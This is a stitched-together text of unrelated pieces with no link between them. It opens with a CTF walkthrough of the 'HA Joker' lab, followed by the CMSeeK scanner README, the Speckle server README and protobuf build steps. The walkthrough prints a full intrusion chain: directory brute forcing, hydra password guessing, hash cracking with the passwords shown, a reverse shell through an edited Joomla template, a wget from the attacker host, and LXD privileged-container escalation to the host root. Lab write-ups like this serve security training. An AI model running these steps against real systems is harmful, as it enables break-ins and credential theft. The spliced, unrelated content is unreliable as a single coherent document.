OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.49 seconds
```
1. Enumerate services on target machine.
1. What version of Apache is it?
> 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
`2.4.29`
2. What port on this machine not need to be authenticated by user and password?
```
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
```
`80`
3. There is a file on this port that seems to be secret, what is it?
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.252.64 -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.252.64
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
2020/10/08 20:03:57 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/phpinfo.php (Status: 200)
/secret.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/10/08 20:05:04 Finished
===============================================================
```
`secret.txt`
5. There is another file which reveals information of the backend, what is it?
`phpinfo.php`
1. When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?
- [http://10.10.252.64/secret.txt](http://10.10.252.64/secret.txt)
```
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
```
2. What port on this machine need to be authenticated by Basic Authentication Mechanism?
```
8080/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
```
3. At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.252.64 -m / http-get
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-08 20:10:16
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.252.64:8080/
[8080][http-get] host: 10.10.252.64 login: joker password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-08 20:10:47
```
`hannah`
5. Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?
- [http://10.10.252.64:8080/robots.txt](http://10.10.252.64:8080/robots.txt)
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
```
`/administrator/`
1. We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ gobuster dir -U joker -P hannah -u http://10.10.252.64:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.252.64:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Auth User: joker
[+] Extensions: gz,tgz,zip,7z,bak,old,tar
[+] Timeout: 10s
===============================================================
2020/10/08 20:33:58 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.tgz (Status: 403)
/.hta.zip (Status: 403)
/.hta.7z (Status: 403)
/.hta.bak (Status: 403)
/.hta.old (Status: 403)
/.hta.tar (Status: 403)
/.hta.gz (Status: 403)
/.htaccess (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.gz (Status: 403)
/.htaccess.tgz (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.7z (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.old (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.gz (Status: 403)
/.htpasswd.tgz (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.7z (Status: 403)
/LICENSE (Status: 200)
/README (Status: 200)
/administrator (Status: 301)
/bin (Status: 301)
/backup (Status: 200)
/backup.zip (Status: 200)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/index.php (Status: 200)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/10/08 20:35:44 Finished
===============================================================
```
```
backup.zip
```
2. We have the backup file and now we should look for some information, for example database, configuration files, etc ... But the backup file seems to be encrypted. What is the password?
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ zip2john backup.zip > backup.hash
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ john backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hannah (backup.zip)
1g 0:00:00:00 DONE 2/3 (2020-10-08 20:19) 6.250g/s 501856p/s 501856c/s 501856C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
`hannah`
3. Remember that... We need access to the administration of the site... Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?
[configuration.php](configuration.php)
```php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = '1234';
public $db = 'joomladb';
public $dbprefix = 'cc1gr_';
```
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ grep CREATE TABLE db/joomladb.sql | grep user
grep: TABLE: No such file or directory
db/joomladb.sql:CREATE TABLE `cc1gr_user_keys` (
db/joomladb.sql:CREATE TABLE `cc1gr_user_notes` (
db/joomladb.sql:CREATE TABLE `cc1gr_user_profiles` (
db/joomladb.sql:CREATE TABLE `cc1gr_user_usergroup_map` (
db/joomladb.sql:CREATE TABLE `cc1gr_usergroups` (
db/joomladb.sql:CREATE TABLE `cc1gr_users` (
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ grep cc1gr_users db/joomladb.sql
-- Table structure for table `cc1gr_users`
DROP TABLE IF EXISTS `cc1gr_users`;
CREATE TABLE `cc1gr_users` (
-- Dumping data for table `cc1gr_users`
LOCK TABLES `cc1gr_users` WRITE;
/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;
kali@kali:~/CTFs/tryhackme/HA Joker CTF$
```
`admin`
5. Super Duper User! What is the password?
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ john admin.hash /usr/share/wordlists/rockyou.txt --format=bcrypt
Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
abcd1234 (?)
1g 0:00:00:09 DONE 2/3 (2020-10-08 20:39) 0.1076g/s 79.44p/s 79.44c/s 79.44C/s yellow..allison
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/CTFs/tryhackme/HA Joker CTF$
```
`abcd1234`
7. At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?
[http://10.10.252.64:8080/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D](http://10.10.252.64:8080/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D)
![](2020-10-08_20-43.png)
[http://10.10.252.64:8080/templates/beez3/error.php](http://10.10.252.64:8080/templates/beez3/error.php)
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.106.222] from (UNKNOWN) [10.10.252.64] 43184
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
11:46:07 up 53 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$
```
`www-data`
8. This user belongs to a group that differs on your own group, What is this group?
`lxd`
10. Spawn a tty shell.
`SHELL=/bin/bash script -q /dev/null`
11. In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling "lxd try it online".
[https://linuxcontainers.org/lxd/introduction/](https://linuxcontainers.org/lxd/introduction/)
13. Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.
```
www-data@ubuntu:/$ cd ~
cd ~
www-data@ubuntu:/var/www$ wget http://10.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz
<.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz
--2020-10-08 11:58:36-- http://10.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz
Connecting to 10.8.106.222:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3183740 (3.0M) [application/gzip]
Saving to: 'alpine-v3.12-x86_64-20201008_2055.tar.gz'
2020-10-08 11:58:38 (1.56 MB/s) - 'alpine-v3.12-x86_64-20201008_2055.tar.gz' saved [3183740/3183740]
www-data@ubuntu:/var/www$ lxc image import alpine-v3.12-x86_64-20201008_2055.tar.gz --alias myalpine
<v3.12-x86_64-20201008_2055.tar.gz --alias myalpine
www-data@ubuntu:/var/www$ lxc image list
lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| myalpine | f2a9284c04f4 | no | alpine v3.12 (20201008_20:55) | x86_64 | 3.04MB | Oct 8, 2020 at 6:59pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
www-data@ubuntu:/var/www$
```
14. The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.
```
www-data@ubuntu:/var/www$ lxc image import alpine-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
<-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
Error: open alpine-v3.12-x86_64-20200623_1255.tar.gz: no such file or directory
www-data@ubuntu:/var/www$ ls
ls
alpine-v3.12-x86_64-20201008_2055.tar.gz html
www-data@ubuntu:/var/www$ lxc image import alpine-v3.12-x86_64-20201008_2055.tar.gz --alias myalpine
<v3.12-x86_64-20201008_2055.tar.gz --alias myalpine
www-data@ubuntu:/var/www$ lxc image list
lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| myalpine | f2a9284c04f4 | no | alpine v3.12 (20201008_20:55) | x86_64 | 3.04MB | Oct 8, 2020 at 6:59pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
www-data@ubuntu:/var/www$ lxc init myalpine joker -c security.privileged=true
lxc init myalpine joker -c security.privileged=true
Creating joker
www-data@ubuntu:/var/www$ lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to joker
www-data@ubuntu:/var/www$ lxc start joker
lxc start joker
www-data@ubuntu:/var/www$ lxc exec joker /bin/sh
lxc exec joker /bin/sh
```
15. What is the name of the file in the /root directory?
```
~ # ^[[26;5Rcat /mnt/root/root/final.txt
cat /mnt/root/root/final.txt
██╗ ██████╗ ██╗ ██╗███████╗██████╗
██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
██║██║ ██║█████╔╝ █████╗ ██████╔╝
██ ██║██║ ██║██╔═██╗ ██╔══╝ ██╔══██╗
╚█████╔╝╚██████╔╝██║ ██╗███████╗██║ ██║
╚════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
~ # ^[[26;5R
```
|
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.1"><img src="https://img.shields.io/badge/Version-1.1.1-brightgreen.svg?style=style=flat-square" alt="version"></a>
<a href="https://github.com/Tuhinshubhra/CMSeeK/"><img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"></a>
<a href="https://github.com/Tuhinshubhra/CMSeeK/stargazers"><img src="https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK.svg" alt="GitHub stars" /></a>
<a href="https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE"><img src="https://img.shields.io/github/license/Tuhinshubhra/CMSeeK.svg" alt="GitHub license" /></a>
<a href="https://inventory.rawsec.ml/tools.html#CMSeek"><img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory" /></a>
<a href="https://twitter.com/r3dhax0r"><img src="https://img.shields.io/twitter/url/https/github.com/Tuhinshubhra/CMSeeK.svg?style=social" alt="Twitter" /></a>
</p>
## What is a CMS?
> A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*.
## Release History
```
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...
```
[Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG)
## Functions Of CMSeek:
- Basic CMS Detection of over 155 CMS
- Drupal version detection
- Advanced Wordpress Scans
- Detects Version
- User Enumeration
- Plugins Enumeration
- Theme Enumeration
- Detects Users (3 Detection Methods)
- Looks for Version Vulnerabilities and much more!
- Advanced Joomla Scans
- Version detection
- Backup files finder
- Admin page finder
- Core vulnerability detection
- Directory listing check
- Config leak detection
- Various other checks
- Modular bruteforce system
- Use pre made bruteforce modules or create your own and integrate with it
## Requirements and Compatibility:
CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed.
## Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
- git clone `https://github.com/Tuhinshubhra/CMSeeK`
- cd CMSeeK
- pip/pip3 install -r requirements.txt
For guided scanning:
- python3 cmseek.py
Else:
- python3 cmseek.py -u <target_url> [...]
Help menu from the program:
```
USAGE:
python3 cmseek.py (for a guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>
SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, -list LIST path of the file containing list of sites
for multi-site scan (comma separated)
RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)
USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent
OUTPUT:
-v, --verbose Increase output verbosity
VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit
HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result
EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com
```
## Checking For Update:
You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update.
P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update.
## Detection Methods:
CMSeek detects CMS via the following:
- HTTP Headers
- Generator meta tag
- Page source code
- robots.txt
## Supported CMSs:
CMSeeK currently can detect **157** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory.
All the cmss are stored in the following way:
```
cmsID = {
'name':'Name Of CMS',
'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}
```
## Scan Result:
All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.
Here is an example of the json report log:
![Json Log](https://i.imgur.com/5dA9jQg.png)
## Bruteforce Modules:
CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:
1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex
2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module
3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory
4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu.
5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.
<p align='center'>
<img alt="Cache Rebuild Screenshot" width="400px" src="https://i.imgur.com/2Brl7pl.png" />
</p>
## Need More Reasons To Use CMSeeK?
If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages.
Also you can try reading comments in the code those are pretty random and weird!!!
## Screenshots:
<p align="center">
<img alt="Main Menu" width="600px" src="https://s8.postimg.cc/ha6754v6t/cmseek_-v_068.png" />
<br><em>Main Menu</em><br>
<img alt="Scan Result" width="600px" src="https://s8.postimg.cc/f6vrxg0it/result.png" />
<br><em>Scan Result</em><br>
<img alt="WordPress Scan Result" width="600px" src="https://i.imgur.com/CK4O1Yd.png" />
<br><em>WordPress Scan Result</em><br>
</p>
## Guidelines for opening an issue:
Please make sure you have the following info attached when opening a new issue:
- Target
- Exact copy of error or screenshot of error
- Your operating system and python version
**Issues without these informations might not be answered!**
## Disclaimer:
**Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.**
## License:
CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE)
## Follow Me @r3dhax0r:
[Twitter](https://twitter.com/r3dhax0r)
## Team:
[Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
|
<h1 align="center">
<img src="https://user-images.githubusercontent.com/2679513/131189167-18ea5fe1-c578-47f6-9785-3748178e4312.png" width="150px"/><br/>
Speckle | Server
</h1>
<h3 align="center">
Server and Web packages
</h3>
<p align="center"><b>Speckle</b> is data infrastructure for the AEC industry.</p><br/>
<p align="center"><a href="https://twitter.com/SpeckleSystems"><img src="https://img.shields.io/twitter/follow/SpeckleSystems?style=social" alt="Twitter Follow"></a> <a href="https://speckle.community"><img src="https://img.shields.io/discourse/users?server=https%3A%2F%2Fspeckle.community&style=flat-square&logo=discourse&logoColor=white" alt="Community forum users"></a> <a href="https://speckle.systems"><img src="https://img.shields.io/badge/https://-speckle.systems-royalblue?style=flat-square" alt="website"></a> <a href="https://speckle.guide/dev/"><img src="https://img.shields.io/badge/docs-speckle.guide-orange?style=flat-square&logo=read-the-docs&logoColor=white" alt="docs"></a></p>
<p align="center"><a href="https://github.com/Speckle-Next/SpeckleServer/"><img src="https://circleci.com/gh/specklesystems/speckle-server.svg?style=svg&circle-token=76eabd350ea243575cbb258b746ed3f471f7ac29" alt="Speckle-Next"></a> <a href="https://codecov.io/gh/specklesystems/speckle-server"><img src="https://codecov.io/gh/specklesystems/speckle-server/branch/master/graph/badge.svg" alt="codecov"></a></p>
# About Speckle
What is Speckle? Check our [![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social)](https://www.youtube.com/watch?v=B9humiSpHzM)
### Features
- **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry
- **Version control:** Speckle is the Git & Hub for geometry and BIM data
- **Collaboration:** share your designs collaborate with others
- **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere
- **Interoperability:** get your CAD and BIM models into other software without exporting or importing
- **Real time:** get real time updates and notifications and changes
- **GraphQL API:** get what you need anywhere you want it
- **Webhooks:** the base for a automation and next-gen pipelines
- **Built for developers:** we are building Speckle with developers in mind and got tools for every stack
- **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, Blender and more!
### Try Speckle now!
Give Speckle a try in no time by:
- [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at
- [![create a droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click
### Resources
- [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum!
- [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle
- [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality
# Repo structure
This monorepo is the home of the Speckle v2 web packages:
- [`packages/server`](https://github.com/specklesystems/speckle-server/blob/main/packages/server): the Server, a nodejs app. Core external dependencies are a Redis and Postgresql db.
- [`packages/frontend`](https://github.com/specklesystems/speckle-server/blob/main/packages/frontend): the Frontend, a static Vue app.
- [`packages/viewer`](https://github.com/specklesystems/speckle-server/blob/main/packages/viewer): a threejs extension that allows you to display 3D data [![npm version](https://camo.githubusercontent.com/dc69232cc57b77de6554e752dd6dfc60ca0ecdfbe91bdfcbf7c7531a511ec200/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532467669657765722e737667)](https://www.npmjs.com/package/@speckle/viewer)
- [`packages/objectloader`](https://github.com/specklesystems/speckle-server/blob/main/packages/objectloader): a small js utility class that helps you stream an object and all its sub-components from the Speckle Server API. [![npm version](https://camo.githubusercontent.com/4d4f1e38ce50aaf11b4a3ad8e01ce3eaaa561dc5fd08febbae556f52f1d41097/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532466f626a6563746c6f616465722e737667)](https://www.npmjs.com/package/@speckle/objectloader)
- [`packages/preview-service`](https://github.com/specklesystems/speckle-server/blob/main/packages/preview-service): generates object previews for Speckle Objects headlessly. This package is meant to be called on by the server.
- [`webhook-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/webhook-service): the Webhook service
### Other repos
Make sure to also check and ⭐️ these other Speckle repositories:
- [`speckle-sharp`](https://github.com/specklesystems/speckle-sharp): .NET tooling, connectors and interoperability
- [`specklepy`](https://github.com/specklesystems/specklepy): Python SDK 🐍
- [`speckle-excel`](https://github.com/specklesystems/speckle-excel): Excel connector
- [`speckle-unity`](https://github.com/specklesystems/speckle-unity): Unity 3D connector
- [`speckle-blender`](https://github.com/specklesystems/speckle-blender): Blender connector
- [`speckle-unreal`](https://github.com/specklesystems/speckle-unreal): Unreal Engine Connector
- [`speckle-qgis`](https://github.com/specklesystems/speckle-qgis): QGIS connectod
- [`speckle-powerbi`](https://github.com/specklesystems/speckle-powerbi): PowerBi connector
- and more [connectos & tooling](https://github.com/specklesystems/)!
## Developing and Debugging
Have you checked our [dev docs](https://speckle.guide/dev/)?
We have a detailed section on [deploying a Speckle server](https://speckle.guide/dev/server-setup.html). To get started developing locally, you can see the [run in development mode](https://speckle.guide/dev/server-setup.html#run-in-development-mode) chapter.
### Contributing
Please make sure you read the [contribution guidelines](https://github.com/specklesystems/speckle-server/blob/main/CONTRIBUTING.md) for an overview of the best practices we try to follow.
When pushing commits to this repo, please follow the following guidelines:
- Install [commitizen](https://www.npmjs.com/package/commitizen#commitizen-for-contributors) globally (`npm i -g commitizen`).
- When ready to commit, `git cz` & follow the prompts.
- Please use either `server` or `frontend` as the scope of your commit.
### Security
For any security vulnerabilities or concerns, please contact us directly at security[at]speckle.systems.
### License
Unless otherwise described, the code in this repository is licensed under the Apache-2.0 License. Please note that some modules, extensions or code herein might be otherwise licensed. This is indicated either in the root of the containing folder under a different license file, or in the respective file's header. If you have any questions, don't hesitate to get in touch with us via [email](mailto:hello@speckle.systems).
|
Protocol Buffers - Google's data interchange format
===================================================
Copyright 2008 Google Inc.
https://developers.google.com/protocol-buffers/
C++ Installation - Unix
-----------------------
To build protobuf from source, the following tools are needed:
* autoconf
* automake
* libtool
* make
* g++
* unzip
On Ubuntu/Debian, you can install them with:
sudo apt-get install autoconf automake libtool curl make g++ unzip
On other platforms, please use the corresponding package managing tool to
install them before proceeding.
To get the source, download one of the release .tar.gz or .zip packages in the
release page:
https://github.com/protocolbuffers/protobuf/releases/latest
For example: if you only need C++, download `protobuf-cpp-[VERSION].tar.gz`; if
you need C++ and Java, download `protobuf-java-[VERSION].tar.gz` (every package
contains C++ source already); if you need C++ and multiple other languages,
download `protobuf-all-[VERSION].tar.gz`.
You can also get the source by "git clone" our git repository. Make sure you
have also cloned the submodules and generated the configure script (skip this
if you are using a release .tar.gz or .zip package):
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
git submodule update --init --recursive
./autogen.sh
